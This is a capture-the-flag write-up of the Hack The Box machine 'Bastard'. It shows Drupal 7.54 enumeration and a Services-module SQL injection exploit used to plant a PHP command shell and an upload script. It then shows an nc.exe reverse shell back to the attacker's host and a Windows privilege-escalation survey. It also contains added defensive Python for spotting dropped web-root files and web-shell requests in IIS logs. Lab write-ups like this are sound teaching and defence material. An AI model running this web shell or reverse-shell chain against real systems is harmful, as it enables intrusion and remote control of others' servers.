Bastard
Ports scan
u505@kali:~/HTB/Machines/Bastard$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.9 --rate=1000

Starting masscan 1.0.5 at 2020-03-10 14:03:52 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49154/tcp on 10.10.10.9
Discovered open port 135/tcp on 10.10.10.9
Discovered open port 80/tcp on 10.10.10.9

u505@kali:~/HTB/Machines/Bastard$ nmap -sC -sV 10.10.10.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-10 10:03 EDT
Nmap scan report for bastard.htb (10.10.10.9)
Host is up (0.037s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.79 seconds
Port 80
Dirsearch
u505@kali:~/HTB/Machines/Bastard$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,php" -f -t 10 -u "http://bastard.htb/" --plain-text-report=dirsearch.txt
  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )
Extensions: txt, php | HTTP method: get | Threads: 10 | Wordlist size: 13784
Error Log: /opt/utils/dirsearch/logs/errors-20-03-11_12-46-05.log
Target: http://bastard.htb/
[12:46:06] Starting:
[12:46:16] 403 -   1KB - /.txt
[12:46:16] 403 -   1KB - /.mysql_history/
[12:46:16] 403 -   1KB - /.bash_history.txt
[12:46:16] 403 -   1KB - /.bash_history/
[12:46:16] 403 -   1KB - /.bashrc.php
[12:46:16] 403 -   1KB - /.php
[12:46:16] 403 -   1KB - /.bashrc.txt
[12:46:16] 403 -   1KB - /.bash_history.php
[12:46:16] 403 -   1KB - /.mysql_history.php
[12:46:16] 403 -   1KB - /.mysql_history.txt
[12:46:16] 403 -   1KB - /.bashrc/
[12:46:16] 403 -   1KB - /.passwd.txt
[12:46:16] 403 -   1KB - /.passwd.php
[12:46:16] 403 -   1KB - /.passwd/
[12:46:16] 403 -   1KB - /.profile.txt
[12:46:16] 403 -   1KB - /.profile.php
[12:46:16] 403 -   1KB - /.profile/
[12:46:16] 403 -   1KB - /.rhosts.txt
[12:46:16] 403 -   1KB - /.rhosts.php
[12:46:16] 403 -   1KB - /.rhosts/
[12:46:16] 403 -   1KB - /.sh_history.txt
[12:46:16] 403 -   1KB - /.sh_history.php
[12:46:16] 403 -   1KB - /.sh_history/
[12:46:16] 403 -   1KB - /.ssh.txt
[12:46:16] 403 -   1KB - /.ssh.php
[12:46:16] 403 -   1KB - /.ssh/
[12:49:36] 200 -   7KB - /0/
[12:54:36] 403 -   1KB - /admin/
[12:54:37] 403 -   1KB - /Admin/
[12:54:41] 403 -   1KB - /ADMIN/
[13:04:35] 403 -   1KB - /batch/
[13:12:19] 200 - 108KB - /changelog.txt
[13:12:20] 200 - 108KB - /ChangeLog.txt
[13:19:00] 200 -   1KB - /copyright.txt
[13:20:40] 403 -   1KB - /cron.php
[13:32:30] 403 -   1KB - /entries.txt
[13:32:30] 403 -   1KB - /entries.php
[13:32:30] 403 -   1KB - /entries/
[13:32:30] 403 -   1KB - /Entries.txt
[13:32:30] 403 -   1KB - /Entries.php
[13:32:31] 403 -   1KB - /Entries/
[13:50:09] 403 -   1KB - /includes/
[13:50:19] 200 -   7KB - /index.php
[13:50:20] 200 -   7KB - /Index.php
[13:51:34] 200 -  18KB - /install.txt
[13:51:35] 200 -   2KB - /install.mysql.txt
[13:51:35] 200 -   2KB - /install.pgsql.txt
[13:51:37] 200 -   3KB - /install.php
[13:58:44] 200 -  18KB - /license.txt
[13:58:46] 200 -  18KB - /LICENSE.txt
[14:03:20] 200 -   9KB - /maintainers.txt
[14:07:02] 403 -   1KB - /misc/
[14:07:04] 403 -   1KB - /Misc/
[14:08:03] 403 -   1KB - /modules/
[14:12:03] 200 -   7KB - /node/
[14:27:39] 403 -   1KB - /profiles/
[14:31:59] 200 -   5KB - /readme.txt
[14:32:01] 200 -   5KB - /Readme.txt
[14:32:03] 200 -   5KB - /README.txt
[14:35:51] 200 -   62B - /rest/
[14:36:40] 200 -   2KB - /robots.txt
[14:39:29] 403 -   1KB - /scripts/
[14:39:31] 403 -   1KB - /Scripts/
[14:39:42] 403 -   1KB - /search/
[14:39:44] 403 -   1KB - /Search/
[14:45:31] 403 -   1KB - /sites/
[14:45:32] 403 -   1KB - /Sites/
[14:56:49] 403 -   1KB - /themes/
[14:56:50] 403 -   1KB - /Themes/
[15:02:09] 403 -   1KB - /update.php
[15:02:17] 200 -  10KB - /upgrade.txt
[15:03:02] 200 -   7KB - /user/
[15:14:01] 200 -   42B - /xmlrpc.php
[15:14:05] 200 -   42B - /xmlrpc.php/
Task Completed
Robots.txt
u505@kali:~/HTB/Machines/Bastard$ curl http://bastard.htb/robots.txt
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html

User-agent: *
Crawl-delay: 10
# CSS, JS, Images
Allow: /misc/*.css$
Allow: /misc/*.css?
Allow: /misc/*.js$
Allow: /misc/*.js?
Allow: /misc/*.gif
Allow: /misc/*.jpg
Allow: /misc/*.jpeg
Allow: /misc/*.png
Allow: /modules/*.css$
Allow: /modules/*.css?
Allow: /modules/*.js$
Allow: /modules/*.js?
Allow: /modules/*.gif
Allow: /modules/*.jpg
Allow: /modules/*.jpeg
Allow: /modules/*.png
Allow: /profiles/*.css$
Allow: /profiles/*.css?
Allow: /profiles/*.js$
Allow: /profiles/*.js?
Allow: /profiles/*.gif
Allow: /profiles/*.jpg
Allow: /profiles/*.jpeg
Allow: /profiles/*.png
Allow: /themes/*.css$
Allow: /themes/*.css?
Allow: /themes/*.js$
Allow: /themes/*.js?
Allow: /themes/*.gif
Allow: /themes/*.jpg
Allow: /themes/*.jpeg
Allow: /themes/*.png
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
Changelog file
The Changelog file informs us that the exact Drupal version is 7.54.
u505@kali:~/HTB/Machines/Bastard$ curl -s http://bastard.htb/CHANGELOG.txt | head
Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
  https://www.drupal.org/node/2826480).
- Logging of searches can now be disabled (new option in the administrative
  interface).
- Added menu tree render structure to (pre-)process hooks for theme_menu_tree()
  (API addition: https://www.drupal.org/node/2827134).
- Added new function for determining whether an HTTPS request is being served
Searchsploit
u505@kali:~/HTB/Machines/Bastard$ searchsploit "Drupal 7."
--------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                       |  Path
                                                                     | (/usr/share/exploitdb/)
--------------------------------------------------------------------- ----------------------------------------
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)   | exploits/php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)    | exploits/php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Passwo | exploits/php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Passwo | exploits/php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execut | exploits/php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                               | exploits/php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                   | exploits/php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution              | exploits/php/webapps/3313.pl
Drupal < 7.34 - Denial of Service                                    | exploits/php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metaspl | exploits/php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Executio | exploits/php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote | exploits/php/webapps/44449.rb
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cr | exploits/php/webapps/25493.txt
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution        | exploits/php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Script | exploits/php/webapps/35397.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)    | exploits/php/remote/40130.rb
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure    | exploits/php/webapps/44501.txt
--------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
The Drupalgeddon exploit needs an authenticated user.
Drupal 7.x Module Services - Remote Code Execution
u505@kali:~/HTB/Machines/Bastard$ searchsploit -m 41564
  Exploit: Drupal 7.x Module Services - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/41564
     Path: /usr/share/exploitdb/exploits/php/webapps/41564.php
File Type: ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Bastard/41564.php
The Services module is a standardized solution for building APIs so that external clients can communicate with Drupal. Basically, it allows anybody to build SOAP, REST or XML-RPC endpoints to send and fetch information in several output formats. One feature of the module is that the client controls the input/output format by changing the Content-Type/Accept headers. By default, the following input formats are allowed:
- application/xml
- application/json
- multipart/form-data
- application/vnd.php.serialized
The vulnerability is an SQL injection that uses a UNION to log in as an administrator with a fake password hash. Once logged in as an administrator, the exploit alters the cache to write a file on the server, and finishes by restoring the original cache.
Drupal exploitation to gain a reverse shell
The Drupal Services module exploit allows us to upload files to the server. We will use it to upload two small PHP scripts: the first runs commands, the second uploads the nc.exe binary to the server. To do so we need to determine the REST endpoint; dirsearch found the rest folder.
Browsing to the rest folder gives us the endpoint name.
Commands php
This PHP script executes the command sent in the cmd parameter.
u505@kali:~/HTB/Machines/Bastard$ cat u505_cmd.php
<?php system($_GET["cmd"]); ?>
Starting from the original script, we modify a few lines to load our file u505_cmd.php.
u505@kali:~/HTB/Machines/Bastard$ head -n 20 41564_u505.php
<?php

error_reporting(E_ALL);

define('QID', 'anything');
define('TYPE_PHP', 'application/vnd.php.serialized');
define('TYPE_JSON', 'application/json');
define('CONTROLLER', 'user');
define('ACTION', 'login');

$url = 'http://bastard.htb';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$filecontent = file_get_contents('u505_cmd.php');

$file = [
    'filename' => 'u505_cmd.php',
    'data' => $filecontent
];
The execution of the exploit gives:
u505@kali:~/HTB/Machines/Bastard$ php 41564_u505.php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://bastard.htb/u505_cmd.php
Now we can execute commands on the server.
u505@kali:~/HTB/Machines/Bastard$ curl http://bastard.htb/u505_cmd.php?cmd=whoami
nt authority\iusr
Upload php
The vulnerability lets us write ASCII files (PHP, for example), but binary files fail. This PHP script lets us upload any kind of file to the server.
u505@kali:~/HTB/Machines/Bastard$ cat u505_upload.php
Upload file
<?php
if(isset($_FILES['uploadfile'])){
    $errors= array();
    $file_name = $_FILES['uploadfile']['name'];
    $file_size =$_FILES['uploadfile']['size'];
    $file_tmp =$_FILES['uploadfile']['tmp_name'];
    $file_type=$_FILES['uploadfile']['type'];
    // end() needs a variable, not the return value of explode()
    $name_parts=explode('.',$_FILES['uploadfile']['name']);
    $file_ext=strtolower(end($name_parts));

    if(empty($errors)==true){
        move_uploaded_file($file_tmp,$file_name);
        echo "Success";
    }else{
        print_r($errors);
    }
}
?>
<html>
<body>
<form action="" method="POST" enctype="multipart/form-data">
<input type="file" name="uploadfile" />
<input type="submit"/>
</form>
</body>
</html>
We make a few changes to upload the new PHP file.
u505@kali:~/HTB/Machines/Bastard$ head -n 20 41564_u505_upload.php
<?php

error_reporting(E_ALL);

define('QID', 'anything');
define('TYPE_PHP', 'application/vnd.php.serialized');
define('TYPE_JSON', 'application/json');
define('CONTROLLER', 'user');
define('ACTION', 'login');

$url = 'http://bastard.htb';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$filecontent = file_get_contents('u505_upload.php');

$file = [
    'filename' => 'u505_upload.php',
    'data' => $filecontent
];
And we upload the PHP file through the vulnerability.
u505@kali:~/HTB/Machines/Bastard$ php 41564_u505_upload.php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://bastard.htb/u505_upload.php
Upload nc.exe
u505@kali:~/HTB/Machines/Bastard$ cp /usr/share/windows-resources/binaries/nc.exe ./
u505@kali:~/HTB/Machines/Bastard$ curl http://bastard.htb/u505_cmd.php?cmd=dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of C:\inetpub\drupal-7.54

14/03/2020  09:39 ▒▒    <DIR>          .
14/03/2020  09:39 ▒▒    <DIR>          ..
19/03/2017  12:42 ▒▒               317 .editorconfig
19/03/2017  12:42 ▒▒               174 .gitignore
19/03/2017  12:42 ▒▒             5.969 .htaccess
19/03/2017  12:42 ▒▒             6.604 authorize.php
19/03/2017  12:42 ▒▒           110.781 CHANGELOG.txt
19/03/2017  12:42 ▒▒             1.481 COPYRIGHT.txt
19/03/2017  12:42 ▒▒               720 cron.php
19/03/2017  12:43 ▒▒    <DIR>          includes
19/03/2017  12:42 ▒▒               529 index.php
19/03/2017  12:42 ▒▒             1.717 INSTALL.mysql.txt
19/03/2017  12:42 ▒▒             1.874 INSTALL.pgsql.txt
19/03/2017  12:42 ▒▒               703 install.php
19/03/2017  12:42 ▒▒             1.298 INSTALL.sqlite.txt
19/03/2017  12:42 ▒▒            17.995 INSTALL.txt
19/03/2017  12:42 ▒▒            18.092 LICENSE.txt
19/03/2017  12:42 ▒▒             8.710 MAINTAINERS.txt
19/03/2017  12:43 ▒▒    <DIR>          misc
19/03/2017  12:43 ▒▒    <DIR>          modules
14/03/2020  09:39 ▒▒            59.392 nc.exe
19/03/2017  12:43 ▒▒    <DIR>          profiles
19/03/2017  12:42 ▒▒             5.382 README.txt
19/03/2017  12:42 ▒▒             2.189 robots.txt
19/03/2017  12:43 ▒▒    <DIR>          scripts
19/03/2017  12:43 ▒▒    <DIR>          sites
19/03/2017  12:43 ▒▒    <DIR>          themes
14/03/2020  09:18 ▒▒                31 u505_cmd.php
14/03/2020  09:28 ▒▒               718 u505_upload.php
19/03/2017  12:42 ▒▒            19.986 update.php
19/03/2017  12:42 ▒▒            10.123 UPGRADE.txt
19/03/2017  12:42 ▒▒             2.200 web.config
19/03/2017  12:42 ▒▒               417 xmlrpc.php
              24 File(s)        277.402 bytes
               9 Dir(s)  30.808.170.496 bytes free
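The listing above is also what a defender would look at: every file that ships with Drupal 7.54 carries the 2017 timestamp, and the three files dropped during this exercise (nc.exe, u505_cmd.php, u505_upload.php) stand out by name and by date. The following Python is an added example, not part of the write-up: it parses a Windows dir listing and flags every web-root entry that is either absent from a baseline manifest or modified after the install baseline. The sample listing is constructed from a subset of the entries above; the server's Greek locale prints πμ/μμ as the AM/PM markers (they appear mangled in the capture), and the el-GR thousands separator is a dot. The baseline manifest and timestamp are assumptions; in practice they come from a clean install of the same release.

```python
import re
from datetime import datetime

# Constructed sample modelled on the 'dir' listing of C:\inetpub\drupal-7.54
# above (subset of entries; Greek locale, so πμ = AM and μμ = PM).
DIR_OUTPUT = """\
 Directory of C:\\inetpub\\drupal-7.54

14/03/2020  09:39 πμ    <DIR>          .
14/03/2020  09:39 πμ    <DIR>          ..
19/03/2017  12:42 μμ             5.969 .htaccess
19/03/2017  12:42 μμ           110.781 CHANGELOG.txt
19/03/2017  12:42 μμ               529 index.php
19/03/2017  12:43 μμ    <DIR>          modules
14/03/2020  09:39 πμ            59.392 nc.exe
19/03/2017  12:42 μμ             2.189 robots.txt
14/03/2020  09:18 πμ                31 u505_cmd.php
14/03/2020  09:28 πμ               718 u505_upload.php
19/03/2017  12:42 μμ               417 xmlrpc.php
              24 File(s)        277.402 bytes
"""

# Assumed baseline: the top-level names of a clean Drupal 7.54 tarball that
# occur in the sample, and the day the site was installed (from systeminfo).
EXPECTED = {".htaccess", "CHANGELOG.txt", "index.php", "modules", "robots.txt", "xmlrpc.php"}
BASELINE = datetime(2017, 3, 19, 23, 59)

_ENTRY = re.compile(
    r"^(\d{2}/\d{2}/\d{4})\s+(\d{2}:\d{2})\s+(πμ|μμ)\s+(<DIR>|[\d.]+)\s+(.+?)\s*$"
)


def parse_dir(text):
    """Return [(name, is_dir, size_bytes, mtime)] for each entry of a dir listing."""
    entries = []
    for line in text.splitlines():
        m = _ENTRY.match(line)
        if not m:
            continue  # header, summary and blank lines carry no entry
        date, clock, ampm, size, name = m.groups()
        if name in (".", ".."):
            continue
        hour, minute = (int(x) for x in clock.split(":"))
        if ampm == "μμ" and hour != 12:   # PM, except 12 μμ which is noon
            hour += 12
        elif ampm == "πμ" and hour == 12:  # 12 πμ is midnight
            hour = 0
        day, month, year = (int(x) for x in date.split("/"))
        is_dir = size == "<DIR>"
        size_bytes = 0 if is_dir else int(size.replace(".", ""))  # el-GR: 110.781 -> 110781
        entries.append((name, is_dir, size_bytes, datetime(year, month, day, hour, minute)))
    return entries


def flag_webroot(text=DIR_OUTPUT, expected=EXPECTED, baseline=BASELINE):
    """Names that are not in the baseline manifest or were written after the
    baseline timestamp: candidates for dropped tooling or web shells."""
    return [name for name, _d, _s, mtime in parse_dir(text)
            if name not in expected or mtime > baseline]


if __name__ == "__main__":
    for name in flag_webroot():
        print("unexpected web-root entry:", name)
```

A real deployment would compare hashes rather than names and dates, since an attacker who can write files can also backdate them; the name-and-mtime pass is the cheap first filter that already catches everything dropped in this write-up.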
Reverse shell
Raise the listener
u505@kali:~/HTB/Machines/Bastard$ rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Now we will send the command nc 10.10.14.21 4444 -e cmd to the server (we need to URL encode it).
u505@kali:~/HTB/Machines/Bastard$ curl http://bastard.htb/u505_cmd.php?cmd=nc.exe%2010.10.14.21%204444%20%2De%20cmd
And the reverse shell is opened.
u505@kali:~/HTB/Machines/Bastard$ rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.9.
Ncat: Connection from 10.10.10.9:49179.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr
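From the server's side, every step of this chain leaves a trace in the IIS W3C log: a POST to the Services login path, then GET requests to a top-level .php file that is not part of Drupal, carrying a command line in its query string. The following Python is an added example, not from the write-up: it parses a constructed IIS log excerpt (modelled on the requests made above; not real log data from the machine) and flags requests that hit an unknown top-level PHP file or pass a command-looking value in a shell-style parameter. The allowlist of Drupal entry points is taken from the dir listing above; the parameter names and command-line patterns are my own assumptions and would be tuned per site.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS 7.5 W3C log excerpt; IIS writes '-' for empty fields and
# replaces spaces in the user agent with '+'.
IIS_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2020-03-14 07:18:02 10.10.10.9 POST /rest/user/login - 80 - 10.10.14.21 - 200 0 0 312
2020-03-14 07:20:11 10.10.10.9 GET /u505_cmd.php cmd=whoami 80 - 10.10.14.21 curl/7.68.0 200 0 0 15
2020-03-14 07:25:30 10.10.10.9 GET /node/1 - 80 - 10.10.14.30 Mozilla/5.0 200 0 0 40
2020-03-14 07:28:44 10.10.10.9 POST /u505_upload.php - 80 - 10.10.14.21 Mozilla/5.0 200 0 0 120
2020-03-14 07:39:40 10.10.10.9 GET /u505_cmd.php cmd=nc.exe%2010.10.14.21%204444%20%2De%20cmd 80 - 10.10.14.21 curl/7.68.0 200 0 0 30
2020-03-14 07:41:02 10.10.10.9 GET /index.php q=user/login 80 - 10.10.14.30 Mozilla/5.0 200 0 0 22
"""

# PHP entry points that ship with Drupal 7 at the web root (see the 'dir'
# listing); any other top-level .php file was not installed by Drupal.
DRUPAL_ROOT_PHP = {"/index.php", "/xmlrpc.php", "/cron.php", "/update.php",
                   "/install.php", "/authorize.php"}

# Assumed: parameter names typical of one-line command shells, and decoded
# values that look like a command line rather than application data.
SHELL_PARAMS = {"cmd", "c", "exec", "command"}
CMDLINE_PATTERN = re.compile(r"(\.exe\b|\bwhoami\b|\bcmd(\.exe)?\b|\bpowershell\b|\s-e\s)", re.I)


def parse_iis_w3c(text):
    """Parse an IIS W3C log into dicts keyed by the names in the #Fields directive."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # field names are space separated
            continue
        if line.startswith("#") or not line.strip():
            continue
        values = line.split(" ")
        if fields is None or len(values) != len(fields):
            continue  # no header yet, or a malformed row: skip rather than guess
        rows.append(dict(zip(fields, values)))
    return rows


def find_webshell_activity(text):
    """Return (timestamp, client_ip, uri_stem, reason) for suspicious requests."""
    findings = []
    for r in parse_iis_w3c(text):
        stem, query = r["cs-uri-stem"], r["cs-uri-query"]
        reasons = []
        if stem.lower().endswith(".php") and stem.count("/") == 1 and stem not in DRUPAL_ROOT_PHP:
            reasons.append("php file not part of the Drupal install")
        if query != "-":
            # parse_qs percent-decodes, so %2De becomes -e before matching
            for name, values in parse_qs(query, keep_blank_values=True).items():
                if name.lower() in SHELL_PARAMS and any(CMDLINE_PATTERN.search(v) for v in values):
                    reasons.append("command line in parameter %r" % name)
        if reasons:
            findings.append((r["date"] + " " + r["time"], r["c-ip"], stem, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for when, ip, stem, why in find_webshell_activity(IIS_LOG):
        print(when, ip, stem, "->", why)
```

Note what the log does not show: IIS records the query string but not request bodies or Content-Type, so the Services login abuse itself is only visible as a POST to /rest/user/login, and the upload through u505_upload.php only as a POST to an unknown file. That is why the file-based check (unexpected PHP at the web root) carries most of the weight here, and why request-body logging or a WAF in front of the REST endpoint is what would catch the first step.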
User Flag
C:\inetpub\drupal-7.54>type C:\Users\dimitris\Desktop\user.txt
type C:\Users\dimitris\Desktop\user.txt
<USER_FLAG>
Elevation of privileges
Systeminfo
C:\inetpub\drupal-7.54>systeminfo
systeminfo

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 ▒▒
System Boot Time:          14/3/2020, 8:49:56 ▒▒
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.599 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.624 MB
Virtual Memory: In Use:    471 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9
The system is a Windows Server 2008 R2 with no hotfix installed at all.
Windows Exploit Suggester
This system has 207 vulnerabilities, 47 of which are classified as Elevation of Privilege.
u505@kali:~/HTB/Machines/Bastard$ wes systeminfo.txt -i "Elevation of Privilege"
Windows Exploit Suggester 0.98 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
    - Name: Windows Server 2008 R2 for x64-based Systems
    - Generation: 2008 R2
    - Build: 7600
    - Version: None
    - Architecture: x64-based
    - Installed hotfixes: None
[+] Loading definitions
    - Creation date of definitions: 20200221
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Applying display filters
[+] Found vulnerabilities
Date: 20110712 CVE: CVE-2011-1282 KB: KB2507938 Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110712 CVE: CVE-2011-1283 KB: KB2507938 Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110712 CVE: CVE-2011-1281 KB: KB2507938 Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110712 CVE: CVE-2011-1285 KB: KB2507938 Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20111213 CVE: CVE-2011-3408 KB: KB2620712 Title: Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110913 CVE: CVE-2011-1984 KB: KB2571621 Title: Vulnerability in WINS Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0003 KB: KB2742598 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0003 KB: KB2756920 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20120214 CVE: CVE-2012-0149 KB: KB2645640 Title: Vulnerabilities in Ancillary Function Driver Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20120612 CVE: CVE-2012-0217 KB: KB2709715 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploits: https://www.exploit-db.com/exploits/28718/, https://www.exploit-db.com/exploits/46508/
Date: 20130409 CVE: CVE-2013-1293 KB: KB2840149 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1293 KB: KB2808735 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
